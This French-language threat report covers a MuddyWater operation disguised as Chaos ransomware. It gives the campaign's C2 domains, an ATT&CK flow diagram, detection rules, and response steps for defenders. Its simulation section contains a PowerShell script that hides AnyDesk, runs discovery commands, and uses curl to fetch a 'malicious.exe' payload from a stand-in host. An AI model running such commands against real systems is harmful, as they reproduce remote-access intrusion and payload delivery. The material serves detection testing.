Suivre 
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Au début de 2026, ce qui semblait initialement être un incident routinier de ransomware Chaos a été plus tard identifié comme une opération sous faux drapeau liée au groupe iranien MuddyWater, également connu sous le nom de Seedworm. Au lieu de se concentrer sur le chiffrement des fichiers, les attaquants ont utilisé Microsoft Teams pour l’ingénierie sociale, volé des identifiants et des jetons MFA, et déployé un téléchargeur personnalisé avec un cheval de Troie d’accès à distance. L’opération a réutilisé une infrastructure associée à MuddyWater, y compris un certificat de signature de code, et était axée sur le vol de données et un accès persistant à long terme.
Enquête
Les enquêteurs de Rapid7 ont reconstitué la chaîne d’intrusion depuis le vol d’identifiants basé sur Teams jusqu’à l’utilisation d’outils d’administration à distance légitimes tels que AnyDesk et DWAgent, suivi par la livraison de ms_upd.exe, qui a récupéré un RAT personnalisé nommé Game.exe. L’équipe a identifié des domaines de commande et de contrôle, y compris moonzonet.com and uploadfiler.com, ainsi que plusieurs adresses IP associées et un certificat de signature précédemment lié à MuddyWater. L’analyse des logiciels malveillants a également révélé un comportement anti-analyse, un mutex utilisé pour faire respecter une exécution unique, et des mécanismes de persistance impliquant un service et des fichiers cachés.
Atténuation
Les organisations devraient renforcer les protections MFA, restreindre l’accès à distance au bureau et le partage d’écran de Teams aux comptes de confiance, et surveiller l’utilisation des outils d’accès à distance légitimes dans des contextes inhabituels. Une liste blanche d’applications doit être appliquée aux fichiers binaires signés par des codes, et l’exécution de fichiers non signés à partir de répertoires accessibles aux utilisateurs doit être bloquée. Les équipes de sécurité doivent également auditer l’utilisation des certificats régulièrement et bloquer les domaines et adresses IP malveillants connus liés à la campagne.
Réponse
Si cette activité est détectée, isolez immédiatement les systèmes affectés, révoquez les identifiants compromis et les jetons MFA, et commencez une collecte judiciaire complète. L’infrastructure de commande et de contrôle identifiée doit être bloquée, les services AnyDesk et DWAgent doivent être supprimés, et le RAT personnalisé doit être éradiqué de l’environnement. Une chasse aux menaces doit également être effectuée pour le mutex ATTRIBUTES_ObjectKernel et tous les fichiers restants stockés sous ProgramData.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#aaffaa classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes u2013 Actions action_initial_access["<b>Action</b> – <b>T1566 Phishing</b><br/>L’adversaire a envoyé des messages Microsoft Teams malveillants attirant les utilisateurs vers une fausse session de partage d’écran Quick Assist."] class action_initial_access action action_user_exec_link["<b>Action</b> – <b>T1204.001 Exécution par l’utilisateur : Lien malveillant</b><br/>Les victimes ont cliqué sur un lien malveillant livré via Teams qui a initié le téléchargement de <i>ms_upd.exe</i>."] class action_user_exec_link action action_user_exec_copypaste["<b>Action</b> – <b>T1204.004 Exécution par l’utilisateur : Copier-coller malveillant</b><br/>Les attaquants ont demandé aux utilisateurs de copier-coller des identifiants dans des fichiers texte créés localement."] class action_user_exec_copypaste action action_cred_access["<b>Action</b> – <b>T1552.008 Identifiants non sécurisés</b> & <b>T1078 Comptes valides</b><br/>Identifiants recueillis à partir de messages de chat et utilisés pour se connecter aux systèmes internes."] class action_cred_access action action_auth_mod["<b>Action</b> – <b>T1556.001 Authentification du contrôleur de domaine</b><br/>Les identifiants compromis ont été utilisés pour s’authentifier au contrôleur de domaine et obtenir un accès privilégié."] class action_auth_mod action action_discovery["<b>Action</b> – <b>T1082 Découverte d’informations système</b> & <b>T1016 Découverte de configuration réseau système</b><br/>Le logiciel malveillant a collecté le nom d’hôte, le nom d’utilisateur, le domaine, l’adresse IP via ipconfig, whoami, etc."] class action_discovery action action_ingress_transfer["<b>Action</b> – <b>T1105 Transfert d’outils en entrée</b><br/><i>ms_upd.exe</i> a téléchargé des charges utiles supplémentaires (WebView2Loader.dll, Game.exe, visualwincomp.txt) en utilisant curl."] class action_ingress_transfer action action_execution["<b>Action</b> – <b>T1059 Interprète de commande et de script</b><br/>L’attaquant a exécuté cmd.exe, PowerShell et pythonw.exe pour exécuter les binaires téléchargés."] class action_execution action action_process_injection["<b>Action</b> – <b>T1055.011 Injection de mémoire supplémentaire des fenêtres</b> & <b>T1055.002 Injection d’exécutable portable</b><br/>pythonw.exe a injecté du code dans des processus suspendus pour lancer le RAT furtivement."] class action_process_injection action action_defense_evasion["<b>Action</b> – <b>T1027 Fichiers ou informations obfusqués</b> & <b>T1497 Évasion de virtualisation/sandbox</b><br/>Charges utiles encodées XOR, cryptées AES-256-GCM ; vérifications pour les DLL d’analyse, identifiants VM et minuteurs pour éviter la détection en sandbox."] class action_defense_evasion action action_persistence["<b>Action</b> – <b>T1219 Outils d’accès à distance</b><br/>Déploiement du service DWAgent et d’AnyDesk pour un contrôle à distance à long terme."] class action_persistence action action_lateral_movement["<b>Action</b> – <b>T1563 Détournement de session de service à distance (RDP)</b> & <b>T1668 Contrôle exclusif</b><br/>Des sessions RDP légitimes ont été utilisées pour se déplacer latéralement et exécuter des commandes sur des hôtes supplémentaires."] class action_lateral_movement action action_collection_exfil["<b>Action</b> – <b>T1560 Collecte de données archivées</b> & <b>T1041 Exfiltration via le canal C2</b><br/>Données archivées dans une archive encodée XOR et téléchargées sur uploadfiler.com."] class action_collection_exfil action action_c2["<b>Action</b> – <b>T1090 Proxy</b> & <b>T1573 Canal crypté</b><br/>Communication avec l’infrastructure C2 (moonzonet.com, uploadfiler.com) via HTTPS avec des charges utiles cryptées."] class action_c2 action %% Nodes u2013 Tools / Files / Processes / Malware file_ms_upd["<b>Fichier</b> – <b>Nom</b>: ms_upd.exe<br/><b>Description</b>: Déclencheur initial qui récupère d’autres charges utiles."] class file_ms_upd file file_webview ["<b>Fichier</b> – <b>Nom</b>: WebView2Loader.dll<br/><b>Description</b>: DLL de support pour le rendu du contenu web."] class file_webview file file_game["<b>Fichier</b> – <b>Nom</b>: Game.exe<br/><b>Description</b>: Charge utile secondaire exécutée après le téléchargement."] class file_game file file_visual["<b>Fichier</b> – <b>Nom</b>: visualwincomp.txt<br/><b>Description</b>: Fichier texte utilisé pour les données de configuration."] class file_visual file process_cmd["<b>Processus</b> – <b>Nom</b>: cmd.exe<br/><b>But</b>: Exécute des instructions en ligne de commande."] class process_cmd process process_ps["<b>Processus</b> – <b>Nom</b>: PowerShell<br/><b>But</b>: Exécute des scripts PowerShell pour l’exécution de charges utiles."] class process_ps process process_python["<b>Processus</b> – <b>Nom</b>: pythonw.exe<br/><b>But</b>: Exécute des composants basés sur Python et réalise des injections de processus."] class process_python process malware_dwaga["<b>Malware</b> – <b>Nom</b>: Service DWAgent<br/><b>But</b>: Fournit un accès à distance persistant."] class malware_dwaga malware tool_anydesk["<b>Outil</b> – <b>Nom</b>: AnyDesk<br/><b>Description</b>: Utilitaire de bureau à distance légitime utilisé pour la persistance et le mouvement latéral."] class tool_anydesk tool %% Connections u2013 Flow action_initial_access –>|mène à| action_user_exec_link action_user_exec_link –>|télécharge| file_ms_upd action_user_exec_link –>|mène à| action_user_exec_copypaste action_user_exec_copypaste –>|fournit| action_cred_access action_cred_access –>|active| action_auth_mod action_auth_mod –>|active| action_discovery action_discovery –>|déclenche| action_ingress_transfer action_ingress_transfer –>|télécharge| file_webview action_ingress_transfer –>|télécharge| file_game action_ingress_transfer –>|télécharge| file_visual action_ingress_transfer –>|mène à| action_execution action_execution –>|exécute| process_cmd action_execution –>|exécute| process_ps action_execution –>|exécute| process_python process_python –>|injecte| action_process_injection action_process_injection –>|facilite| action_defense_evasion action_defense_evasion –>|active| action_persistence action_persistence –>|installe| malware_dwaga action_persistence –>|installe| tool_anydesk malware_dwaga –>|soutient| action_lateral_movement tool_anydesk –>|soutient| action_lateral_movement action_lateral_movement –>|collecte| action_collection_exfil action_collection_exfil –>|exfiltre via| action_c2 %% Styling class action_initial_access,action_user_exec_link,action_user_exec_copypaste,action_cred_access,action_auth_mod,action_discovery,action_ingress_transfer,action_execution,action_process_injection,action_defense_evasion,action_persistence,action_lateral_movement,action_collection_exfil,action_c2 action class file_ms_upd,file_webview,file_game,file_visual file class process_cmd,process_ps,process_python process class malware_dwaga malware class tool_anydesk tool "
Flux d’attaque
Détections
Possible Découverte de la Configuration Réseau Système (via ligne de commande)
Afficher
Utilisation possible de PING pour l’exécution différée (via ligne de commande)
Afficher
Logiciel alternatif d’accès/gestion à distance (via création de processus)
Afficher
Utilisation suspecte de CURL (via ligne de commande)
Afficher
Téléchargement de fichier suspect directement par IP (via proxy)
Afficher
IOC (HashSha256) pour détecter : Embrouillage des Pistes : L’Ombre Étatique Derrière le Ransomware Chaos
Afficher
IOC (HashSha1) pour détecter : Embrouillage des Pistes : L’Ombre Étatique Derrière le Ransomware Chaos
Afficher
IOC (HashMd5) pour détecter : Embrouillage des Pistes : L’Ombre Étatique Derrière le Ransomware Chaos
Afficher
IOC (SourceIP) pour détecter : Embrouillage des Pistes : L’Ombre Étatique Derrière le Ransomware Chaos
Afficher
IOC (DestinationIP) pour détecter : Embrouillage des Pistes : L’Ombre Étatique Derrière le Ransomware Chaos
Afficher
Outil de gestion à distance suspect et exécution de commande de découverte [Création de processus Windows]
Afficher
Détecter les connexions interactives et les changements de configuration MFA [Journal des événements de sécurité Microsoft Windows]
Afficher
Exécution de simulation
Prérequis : La vérification pré-vol télémétrie et de base doit avoir passé.
Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.
-
Narratif d’attaque & Commandes :
- Établir un point d’appui distant en utilisant l’outil de gestion à distance légitime AnyDesk.exe (miroir du sélecteur « outil-distant »).
- Effectuer une reconnaissance du réseau en exécutant
ipconfigandwhoamià partir de la même session – satisfaisant le sélecteur « commande de découverte ». - Télécharger une charge utile malveillante en utilisant
curlappelé parcmd.exe, une technique classique pour « Transfert d’outils en entrée » (T1105) et « Interface de ligne de commande » (T1059). - Exécuter la charge utile pour compléter la chaîne de destruction (non nécessaire pour la validation de la règle, mais incluse pour le réalisme).
-
Script de test de régression :
# ------------------------------------------------- # Script de simulation – déclenche la règle Sigma # ------------------------------------------------- # 1. Lancez AnyDesk (simulé – supposez qu'AnyDesk est dans le PATH) Start-Process -FilePath "AnyDesk.exe" -ArgumentList "--no-sandbox" -WindowStyle Hidden # 2. Exécutez les commandes de découverte $discovery = @( "ipconfig /all", "whoami", "net start" ) foreach ($cmd in $discovery) { cmd.exe /c $cmd | Out-Null } # 3. Utilisez cmd.exe + curl pour obtenir une charge utile factice $payloadUrl = "http://example.com/malicious.exe" $outputPath = "$env:TEMPpayload.exe" $downloadCmd = "curl $payloadUrl -o $outputPath" cmd.exe /c $downloadCmd # Optionnel : Exécutez la charge utile (commenté pour la sécurité) # Start-Process -FilePath $outputPath -WindowStyle Hidden # ------------------------------------------------- -
Commandes de nettoyage :
# Terminez AnyDesk s'il a été démarré Get-Process -Name "AnyDesk" -ErrorAction SilentlyContinue | Stop-Process -Force # Supprimez la charge utile téléchargée Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Effacez toutes les instances résiduelles de cmd.exe créées par le script Get-Process -Name "cmd" -ErrorAction SilentlyContinue | Stop-Process -Force
Fin du rapport